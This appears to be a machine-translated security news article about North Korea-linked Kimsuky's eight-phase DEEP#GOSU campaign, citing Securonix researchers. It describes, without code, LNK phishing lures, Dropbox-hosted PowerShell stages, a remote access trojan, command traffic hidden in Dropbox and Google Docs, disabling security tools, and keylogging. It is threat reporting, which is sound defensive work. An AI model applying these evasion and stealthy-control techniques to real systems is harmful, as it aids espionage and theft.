The threat group Kimsukyknown for its connection to North Koreaadopted a chain of attack with eight phasesthrough which cybercriminals abuse legitimate cloud services and deliver malware, aiming to drive cyber espionage It is financial crimes against entities of the South Korea.
According to researchers from Securonixthe campaign attributed to the group – called “DEEP#GOSU” – is based on a strategy of “living off the land”. Cyber espionage operators use commands to install a variety of .NET assemblies, which link to legitimate code components for .NET applications, to create the basis of the attacker’s toolkit.
To conduct malicious operations, Kimsuky also uses LNK files attached to emails, command script downloads from Dropbox, and code written in PowerShell and VBScript.
Typically, typical cyberattacks use five or fewer phases; however, the DEEP#GOSU campaign is based on eight. Oleg Kolesnikov, vice president of threat research at Securonix, explains that some of the tools can be detected by antivirus scanners and other defensive technologies, but attackers actively seek to avoid detection.
“There were many different components and payloads, and different payload components had different scanner detection rates.”clarifies Kolesnikov. “As attackers actively used security tool evasion and disruption techniques – including turning off security tools and adding payloads to exclusions, among others – the number of scanners that detected this was likely less relevant in this case.”.
The Kimsuky group is also known as APT43, Emerald Sleet and Velvet Chollima, having intensified its activity last year with a greater focus on cryptocurrencies, in addition to its traditional objective of cyberespionage.
Although Securonix’s threat analysis shows a slight evolution of the group, these cybercriminals are notorious for their spearphishing and not necessarily because of its technical sophistication.
“Malware payloads… represent a sophisticated, multi-phase threat designed to stealthily operate on Windows systems, especially from a network monitoring perspective.”say the three researchers who carried out the analysis. “Each phase was encrypted using AES and a common password and IV [vetor de inicialização] which should minimize network, or flat file scanning detections.”.
The first stage of the attack is initiated by opening an LNK file attached to an email, which triggers the download of PowerShell code from Dropbox. The code executed during the second phase then downloads additional scripts from Dropbox and requests the compromised system to install a remote access Trojan, TutClient, in the third phase.
Securonix researchers argue in their analysis that the intense use of Dropbox and Google in the later stages helps to evade detection.
“All C2 communication is done through legitimate services such as Dropbox or Google Docs, allowing malware to blend in undetected with normal network traffic.”they wrote. “As these payloads were extracted from remote sources such as Dropbox, this allowed malware maintainers to dynamically update its functionality or deploy additional modules without direct interaction with the system.”.
In addition, the later stages of the attack are based on the installation of a script that is executed randomly in a matter of hours, seeking to help monitor and control systems. The final step monitors user activity by recording keystrokes on the compromised system.
Detection rates for the initial phases of the attack range from 5% to 45% for host-based security. However, the analysis reveals that network security platforms may have some difficulty detecting the later stages of the attack, as Kimsuky cybercriminals rely on encrypted traffic, legitimate cloud file transfer services, and .NET components. .
“In our experience, in cases like this, up-to-date antivirus software may not be sufficient because the behaviors exhibited include disruption and evasion of security tools”warns Kolesnikov. “Our recommendation is that organizations take advantage of defense in depth so they don’t rely solely on a specific security tool”.
Tags: Group linked North Korea launches eightphase cyberattack South Korea
--
